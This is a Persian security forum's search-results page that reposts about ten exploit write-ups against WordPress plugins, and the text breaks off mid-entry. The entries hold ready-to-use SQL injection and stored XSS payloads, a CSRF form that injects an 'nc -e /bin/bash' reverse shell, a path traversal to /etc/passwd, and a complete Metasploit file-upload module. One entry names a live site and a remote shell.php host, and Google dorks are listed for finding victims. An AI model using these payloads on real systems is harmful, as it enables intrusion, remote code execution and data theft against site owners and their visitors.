رفتن به مطلب



iran rules jazbe modir
ADS mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'plugin'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


انجمن آموزش امنیت و راه های مقابله با نفوذ

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
  • بخش ویژه (مخصوص اعضای ویژه)
  • پروژه های تیم
  • مسابقات
  • عمومی
  • بحث آزاد علمی
  • بخش دریافت
  • آرشیو

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

19 نتیجه پیدا شد

  1. # Exploit Title: Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection # Date: 2018-09-09 # Exploit Author: Ceylan Bozogullarindan # Vendor Homepage: http://modalsurvey.pantherius.com/ # Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip # Version: 1.5.7.3 # Tested on: Windows 10 # CVE: N\A # Description # The vulnerability allows an attacker to inject sql commands using a value of a cookie parameter. # PoC # Step 1. When you visit a page which has a poll or survey, a question will be appeared for answering. # Answer that question. # Step 2. When you answer the question, wp_sap will be assigned to a value. Open a cookie manager, # and change it with the payload showed below; ["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] # It is important that the "OR" statement must be 1=2. Because, application is reflecting the first result # of the query. When you make it 1=1, you should see a question from firt record. # Therefore OR statement must be returned False. # Step 3. Reload the page. Open the source code of the page. Search "sss_params". # You will see the version of DB in value of sss_params parameter. # The Request Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] Connection: keep-alive Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 # The result from source code of the page <script type='text/javascript'> /* <![CDATA[ */ var sss_params = {"survey_options":"{\"options\":\"[\\\"center\\\",\\\"easeInOutBack\\\",\\\"\\\",\\\"-webkit-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-moz-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-ms-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-o-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);\\\",\\\"rgb(0, 0, 0)\\\",\\\"rgb(93, 93, 93)\\\",\\\"1\\\",\\\"5\\\",\\\"12\\\",\\\"10\\\",\\\"12\\\",500,\\\"Thank you for your feedback!\\\",\\\"0\\\",\\\"0\\\",\\\"0\\\"]\",\"plugin_url\":\"http:\\\/\\\/www.*****.com\\\/wp-content\\\/plugins\\\/wp-survey-and-poll\",\"admin_url\":\"http:\\\/\\\/www.******.com\\\/wp-admin\\\/admin-ajax.php\",\"survey_id\":\"1101225978\",\"style\":\"modal\",\"expired\":\"false\",\"debug\":\"true\",\"questions\":[[\"Are You A First Time Home Buyer?\",\"Yes\",\"No\"],[\>>>>>>"10.1.36-MariaDB-1~trusty\"<<<<<<<]]}"}; /* ]]> */ </script> DB version: "10.1.36-MariaDB-1~trusty"....
  2. <!-- About: =========== Component: Plainview Activity Monitor (Wordpress plugin) Vulnerable version: 20161228 and possibly prior Fixed version: 20180826 CVE-ID: CVE-2018-15877 CWE-ID: CWE-78 Author: - LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre) Timeline: =========== - 2018/08/25: Vulnerability found - 2018/08/25: CVE-ID request - 2018/08/26: Reported to developer - 2018/08/26: Fixed version - 2018/08/26: Advisory published on GitHub - 2018/08/26: Advisory sent to bugtraq mailing list Description: =========== Plainview Activity Monitor Wordpress plugin is vulnerable to OS command injection which allows an attacker to remotely execute commands on underlying system. Application passes unsafe user supplied data to ip parameter into activities_overview.php. Privileges are required in order to exploit this vulnerability, but this plugin version is also vulnerable to CSRF attack and Reflected XSS. Combined, these three vulnerabilities can lead to Remote Command Execution just with an admin click on a malicious link. References: =========== https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/ PoC: --> <html> <!-- Wordpress Plainview Activity Monitor RCE [+] Version: 20161228 and possibly prior [+] Description: Combine OS Commanding and CSRF to get reverse shell [+] Author: LydA(c)ric LEFEBVRE [+] CVE-ID: CVE-2018-15877 [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data"> <input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" /> <input type="hidden" name="lookup" value="Lookup" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  3. # Exploit Title: WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting # Google Dork: inurl:"/wp-content/plugins/jibu-pro" # Date: 2018-08-29 # Exploit Author: Renos Nikolaou # Software Link: https://downloads.wordpress.org/plugin/jibu-pro.1.7.zip # Version: 1.7 # Tested on: Kali Linux # CVE: N/A # Description: Jinu Pro is prone to Stored Cross Site Scripting vulnerabilities # because it fails to properly sanitize user-supplied input. # PoC - Stored XSS - Parameter: name # 1) Login as a user who have access to Jibu Pro plugin. # 2) Jibu-Pro --> Create Quiz. # 3) At the Quiz Name type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save. # (The first pop-up will appear. Also keep note of the shortcode, similar to: [Test Number]) # 4) Click Create New Questions, fill the fields and click Save. # 5) Copy the Shortcode [Test Number] into any post or page and visit the it via browser. # Post Request (Step 3): POST /wordpress/wp-content/plugins/jibu-pro/quiz_action.php HTTP/1.1 Host: domain.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://domain.com/wordpress/wp-admin/edit.php?page=jibu-pro%2Fquiz_form.php&action=new Cookie: wordpress_295cdc576d46a74a4105db5d33654g45 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 512 name=poc"><script>alert(1)</script>&description=poc&passedMark=3&no_of_ques=3&content=Congrats&_wpnonce=c2414882de&_wp_http_referer=/wordpress/wp-admin/edit.php?page=jibu-pro/quiz_form.php&action=new&action=new&quiz=&user_ID=1&submit=Save
  4. # Exploit Title: WordPress Plugin Quizlord 2.0 - Cross-Site Scripting # Date: 2018-08-29 # Exploit Author: Renos Nikolaou # Software Link: https://downloads.wordpress.org/plugin/quizlord.zip # Version: 2.0 # Tested on: Kali Linux # CVE: N/A # Description : Quizlord is prone to Stored Cross Site Scripting vulnerabilities # because it fails to properly sanitize user-supplied input. # PoC - Stored XSS - Parameter: title # 1) Login as a user who have access to Jibu Pro plugin. # 2) Quizlord --> Add a Quiz. # 3) At the title type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save. # (The first pop-up will appear. Also keep note of the shortcode: [quizlord id="#"]) # 4) Copy the Shortcode [quizlord id="#"] into any post or page and visit the it via browser. # Post Request (Step 3): POST /wordpress/wp-admin/admin.php HTTP/1.1 Host: domain.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://domain.com/wordpress/wp-admin/admin.php?page=quizlord Cookie: wordpress_295cdc576d46a74a4105db5d33654g45 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 188 action=ql_insert&title=poc"><script>alert(1)</script>&description=&time=0&numbtype=numerical&numbmark=&rightcolor=00FF00&wrongcolor=FF0000&showtype=paginated&addquiz=Save
  5. Title: Blind SQL injection and multiple reflected XSS vulnerabilities in Wordpress Plugin Arigato Autoresponder and Newsletter v2.5 Author: Larry W. Cashdollar, @_larry0 Date: 2018-08-22 CVE-IDs:[CVE-2018-1002000][CVE-2018-1002001][CVE-2018-1002002][CVE-2018-1002003][CVE-2018-1002004][CVE-2018-1002005][CVE-2018-1002006][CVE-2018-1002007][CVE-2018-1002008][CVE-2018-1002009] Download Site: https://wordpress.org/plugins/bft-autoresponder/ Vendor: Kiboko Labs https://calendarscripts.info/ Vendor Notified: 2018-08-22, Fixed v2.5.1.5 Vendor Contact: @prasunsen wordpress.org Advisory: http://www.vapidlabs.com/advisory.php?v=203 Description: This plugin allows scheduling of automated autoresponder messages and newsletters, and managing a mailing list. You can add/edit/delete and import/export members. There is also a registration form which can be placed in any website or blog. You can schedule unlimited number of email messages. Messages can be sent on defined number of days after user registration, or on a fixed date. Vulnerability: These vulnerabilities require administrative priveledges to exploit. CVE-2018-1002000 There is an exploitable blind SQL injection vulnerability via the del_ids variable by POST request. In line 69 of file controllers/list.php: 65 $wpdb->query("DELETE FROM ".BFT_USERS." WHERE id IN (".$_POST['del_ids'].")"); del_ids is not sanitized properly. Nine Reflected XSS. CVE-2018-1002001 In line 22-23 of controllers/list.php: 22 $url = "admin.php?page=bft_list&offset=".$_GET['offset']."&ob=".$_GET['ob']; 23 echo "<meta http-equiv='refresh' content='0;url=$url' />"; CVE-2018-1002002 bft_list.html.php:28: <div><label><?php _e('Filter by email', 'broadfast')?>:</label> <input type="text" name="filter_email" value="<?php echo @$_GET['filter_email']?>"></div> CVE-2018-1002003 bft_list.html.php:29: <div><label><?php _e('Filter by name', 'broadfast')?>:</label> <input type="text" name="filter_name" value="<?php echo @$_GET['filter_name']?>"></div> CVE-2018-1002004 bft_list.html.php:42: <input type="text" class="bftDatePicker" name="sdate" id="bftSignupDate" value="<?php echo empty($_GET['sdate']) ? '' : $_GET['sdate']?>"> CVE-2018-1002005 bft_list.html.php:43: <input type="hidden" name="filter_signup_date" value="<?php echo empty($_GET['filter_signup_date']) ? '' : $_GET['filter_signup_date']?>" id="alt_bftSignupDate"></div> CVE-2018-1002006 integration-contact-form.html.php:14: <p><label><?php _e('CSS classes (optional):', 'broadfast')?></label> <input type="text" name="classes" value="<?php echo @$_POST['classes']?>"></p> CVE-2018-1002007 integration-contact-form.html.php:15: <p><label><?php _e('HTML ID (optional):', 'broadfast')?></label> <input type="text" name="html_id" value="<?php echo @$_POST['html_id']?>"></p> CVE-2018-1002008 list-user.html.php:4: <p><a href="admin.php?page=bft_list&ob=<?php echo $_GET['ob']?>&offset=<?php echo $_GET['offset']?>"><?php _e('Back to all subscribers', 'broadfast');?></a></p> CVE-2018-1002009 unsubscribe.html.php:3: <p><input type="text" name="email" value="<?php echo @$_GET['email']?>"></p> Exploit Code: SQL Injection CVE-2018-1002000 $ sqlmap --load-cookies=./cook -r post_data --level 2 --dbms=mysql Where post_data is: POST /wp-admin/admin.php?page=bft_list&ob=email&offset=0 HTTP/1.1 Host: example.com Connection: keep-alive Content-Length: 150 Cache-Control: max-age=0 Origin: http://example.com Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://example.com/wp-admin/admin.php?page=bft_list&ob=email&offset=0 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wordpress_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX mass_delete=1&del_ids=*&_wpnonce=aa7aa407db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dbft_list%26ob%3Demail%26offset%3D0[!http] (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 300 HTTP(s) requests: --- Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: mass_delete=1&del_ids=(CASE WHEN (6612=6612) THEN SLEEP(5) ELSE 6612 END)&_wpnonce=aa7aa407db&_wp_http_referer=/wp-admin/admin.php?page=bft_list%26ob=email%26offset=0[!http] --- [11:50:08] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 8.0 (jessie) web application technology: Apache 2.4.10 back-end DBMS: MySQL >= 5.0.12 [11:50:08] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.47' [*] shutting down at 11:50:08 CVE-2018-1002001 http://example.com/wp-admin/admin.php?page=bft_list&action=edit&id=12&ob=XSS&offset=XSS
  6. # Exploit Title: WordPress Plugin Localize My Post 1.0 - Local File Inclusion # Author: Manuel Garcia Cardenas # Date: 2018-09-19 # Software link: https://es.wordpress.org/plugins/localize-my-post/ # CVE: 2018-16299 # DESCRIPTION # This bug was found in the file: /localize-my-post/ajax/include.php # include($_REQUEST['file']); # The parameter "file" it is not sanitized allowing include local files # To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. # Local File Inclusion POC: GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
  7. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::PhpEXE def initialize(info={}) super(update_info(info, 'Name' => "WordPress Responsive Thumbnail Slider Arbitrary File Upload", 'Description' => %q{ This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication. }, 'License' => MSF_LICENSE, 'Author' => [ 'Arash Khazaei', # EDB PoC 'Shelby Pace' # Metasploit Module ], 'References' => [ [ 'EDB', '37998' ] ], 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Responsive Thumbnail Slider Plugin v1.0', { } ] ], 'Privileged' => false, 'DisclosureDate' => "Aug 28 2015", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]), OptString.new('WPUSERNAME', [ true, "WordPress Username to authenticate with", 'admin' ]), OptString.new('WPPASSWORD', [ true, "WordPress Password to authenticate with", '' ]) ]) end def check # The version regex found in extract_and_check_version does not work for this plugin's # readme.txt, so we build a custom one. check_code = check_version || check_plugin_path if check_code return check_code else return CheckCode::Safe end end def check_version plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt') res = send_request_cgi( 'method' => 'GET', 'uri' => plugin_uri ) if res && res.body && res.body =~ /Version:([\d\.]+)/ version = Gem::Version.new($1) if version <= Gem::Version.new('1.0') vprint_status("Plugin version found: #{version}") return CheckCode::Appears end end nil end def check_plugin_path plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/') res = send_request_cgi( 'method' => 'GET', 'uri' => plugin_uri ) if res && res.code == 200 vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected') return CheckCode::Detected end nil end def login auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD']) return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_cookies store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies) print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}") auth_cookies end def upload_payload(cookies) manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management' file_payload = get_write_exec_payload(:unlink_self => true) file_name = "#{rand_text_alpha(5)}.php" # attempt to access plugins page plugin_res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies ) unless plugin_res && plugin_res.body.include?("tmpl-uploader-window") fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Slider Plugin Page") end data = Rex::MIME::Message.new data.add_part(file_payload, 'image/jpeg', nil, "form-data; name=\"image_name\"; filename=\"#{file_name}\"") data.add_part(file_name.split('.')[0], nil, nil, "form-data; name=\"imagetitle\"") data.add_part('Save Changes', nil, nil, "form-data; name=\"btnsave\"") post_data = data.to_s # upload the file upload_res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, manage_uri, '&action=addedit'), 'cookie' => cookies, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies) fail_with(Failure::Unknown, "Unsure of successful upload") unless (upload_res && page && page.body =~ /New\s+image\s+added\s+successfully/) retrieve_file(page, cookies) end def retrieve_file(res, cookies) fname = res.body.scan(/slider\/(.*\.php)/).flatten[0] fail_with(Failure::BadConfig, "Couldn't find file name") if fname.empty? || fname.nil? file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}") print_good("Successful upload") send_request_cgi( 'uri' => file_uri, 'method' => 'GET', 'cookie' => cookies ) end def exploit unless check == CheckCode::Safe auth_cookies = login upload_payload(auth_cookies) end end end
  8. # Exploit Title: Wordpress Plugin Support Board 1.2.3 - Cross-Site Scripting # Date: 2018-10-16 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://schiocco.com/ # Software Link : https://board.support/ # Software : Support Board - Chat And Help Desk # Version : v1.2.3 # Vulernability Type : Code Injection # Vulenrability : HTML Injection and Stored XSS # CVE : N/A # In the Schiocco "Support Board - Chat And Help Desk" plugin 1.2.3 for WordPress, # a Stored XSS vulnerability has been discovered in file upload areas in the # Chat and Help Desk sections via the msg parameter # in a /wp-admin/admin-ajax.php sb_ajax_add_message action. # HTTP POST Request : [Stored XSS] POST /wp-admin/admin-ajax.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://TARGET/chat/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 450 Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77 Connection: close action=sb_ajax_add_message&msg=&files=https%3A%2F%2FTARGET%2Fwp-content%2Fuploads%2Fsupportboard%2F70765091%2F%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg%7C%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg&time=10%2F15%2F2018%2C+4%3A23%3A42+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang= # In the v1.2.3 version of the Support Board - Chat And Help Desk PHP & Wordpress Plugin, # the Stored XSS vulnerability has been discovered in the HTML Injection vulnerability and # file upload areas in the Chat and Help Desk sections of Schiocco. # HTTP POST Request : [HTML Injection] POST /wp-admin/admin-ajax.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://TARGET/desk-demo/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 288 Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77 Connection: close action=sb_ajax_add_message&msg=%26%238220%3B%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&files=&time=10%2F15%2F2018%2C+4%3A19%3A45+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=
  9. # Exploit Title: WordPress aio-shortcodes Plugin - Remote Code Execution # Google Dork: Index of /wp-content/plugins/aio-shortcodes # Exploit: timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php # Date: 26 Oktober 2018 # Author: L4663r666h05t # Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php # Version: 1.x.x # Screenshot: http://prntscr.com/lahts7 # Tested on: Windows 10 Pro (x64) Versions Affected: 1.x.x Live Site: http://www.qvgop.org/wp-content/plugins/aio-shortcodes/timthumb.php http://www.qvgop.org/wp-content/plugins/aio-shortcodes/timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php Your Shell: http://localhost/wp-content/plugins/aio-shortcodes/cache/md5.php http://localhost/wp-content/plugins/aio-shortcodes/cache/shell.php
  10. ################################################################################################# # Exploit Title : WordPress Simple-Press Simple-Forum Editors and TinyMCE Plugin Full Path Disclosure Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 20/06/2018 # Vendor Homepages : simple-press.com/downloads/tinymce-editor-plugin/ - simplepressforum.com - northworks.ca - moxiecode.com + dsquaredmedia.co.uk - templatic.com - auvergne-rhone-alpes.developpement-durable.gouv.fr + cyberchimps.com/responsive-theme/ - wordpress.com/theme/mimbopro - uusiaalto.com - amesdesign.net # Tested On : Windows and Linux # Versions : WordPress 2.6 - 2.8 - 3.x - 4.2.2 # Category : WebApps # Exploit Risk : Medium # CWE : CWE-200 [ Information Exposure ] An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information. + CWE-399 [ Resource Management Errors ] + CWE-211 [ Information Exposure Through Externally-Generated Error Message ] + CWE-532 [ Information Exposure Through Log Files ] + CWE-538 [ File and Directory Information Exposure ] + CWE-199 [ Information Management Errors ] ################################################################################################# # Description : Every forum needs a decent editor, and with TinyMCE you get just that. Provide your users with the same editor as you find in the WordPress admin panel to allow for an all round more familiar and user friendly posting experience. This editor can utilise two toolbars and also TinyMCE plugins, of which it comes pre supplied with all editing essentials such as ‘bold’, ‘blockquote’, ‘spoiler’, ‘link’, ‘image’ and more. Settings allow you all the control you should need including the essential option of rejecting posts with embedded formatting. # Screenshot 1 => simple-press.com/wp-content/uploads/edd/2015/04/tinymce-editor-1.png # Screenshot 2 => simple-press.com/wp-content/uploads/edd/2015/04/tinymce-editor-2.png # According to Owasp Security Portal, Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view. # Risk Factor : The risks regarding FPD may produce various outcomes. For example, if the webroot is getting leaked, attackers may abuse the knowledge and use it in combination with file inclusion vulnerabilites to steal configuration files regarding the web application or the rest of the operating system. For Example : Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2 In combination with, say, unproteced use of the PHP function file_get_contents, the attacker gets an opportunity to steal configuration files. The sourcecode of index.php: <?php echo file_get_contents(getcwd().$_GET['page']); ?> An attacker crafts a URL like so: http://site.com/index.php?page=../../../../../../../home/example/public_html/includes/config.php with the knowledge of the FPD in combination with Relative Path Traversal <?php //Hidden configuration file containing database credentials. $hostname = 'localhost'; $username = 'root'; $password = 'owasp_fpd'; $database = 'example_site'; $connector = mysql_connect($hostname, $username, $password); mysql_select_db($database, $connector); ?> Disregarding the above sample, FPD can also be used to reveal the underlaying operation system by observing the file paths. Windows for instance always start with a drive-letter, e.g; C:\, while Unix based operating system tend to start with a single front slash. *NIX: Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/alice/public_html/includes/functions.php on line 2 Microsoft Windows: Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in C:\Users\bob\public_html\includes\functions.php on line 2 The FPD may reveal a lot more than people normally might suspect. The two examples above reveal usernames on the operating systems as well; "alice" and "bob". Usernames are of course important pieces of credentials. Attackers can use those in many different ways, ranging all from bruteforcing over various protocols (SSH, Telnet, RDP, FTP...) to launching exploits requiring working usernames. You can check here to full understand of the attack : owasp.org/index.php/Full_Path_Disclosure ################################################################################################# # Google Dorks : inurl:''/wp-content/plugins/simple-forum/editors/tinymce/'' intext:''proudly designed by dsquaredmedia.co.uk'' intext:''Website by NorthWorks'' intext:''Powered By WordPress | Voyage Theme'' intext:''Powered by WordPress & Mimbo Pro'' intext:''Web Site By dsixty'' intext:''© Mainostoimisto Underground Graphics 2012'' intext:''Grace Theme by Templatic" intext:''développé avec WordPress pour la DREAL Auvergne'' intext:''Site designed by amesDesign'' intext:''Responsive Theme powered by WordPress'' ################################################################################################# Full Path Disclosure Vulnerabilities => # Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php Error : {"result":null,"id":null,"error":{"errstr":"Could not get raw post data.","errfile":"","errline":null,"errcontext":"","level":"FATAL"}} # Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php Error : Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_Logger has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php on line 21 # Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php Error : Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSONReader has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 26 Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSON has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 362 # Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php Error : Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 9 Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 15 # Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/SpellChecker.php Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; SpellChecker has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/SpellChecker.php on line 9 # Exploit : /wp-content/plugins/simple-forum/admin/panel-admins/sfa-admins.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-admins/sfa-admins.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-admins/sfa-admins.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-config/sfa-config.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-config/sfa-config.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-config/sfa-config.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-forums/sfa-forums.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-forums/sfa-forums.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-forums/sfa-forums.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-integration/sfa-integration.php Fatal error: Uncaught Error: Call to undefined function __() in 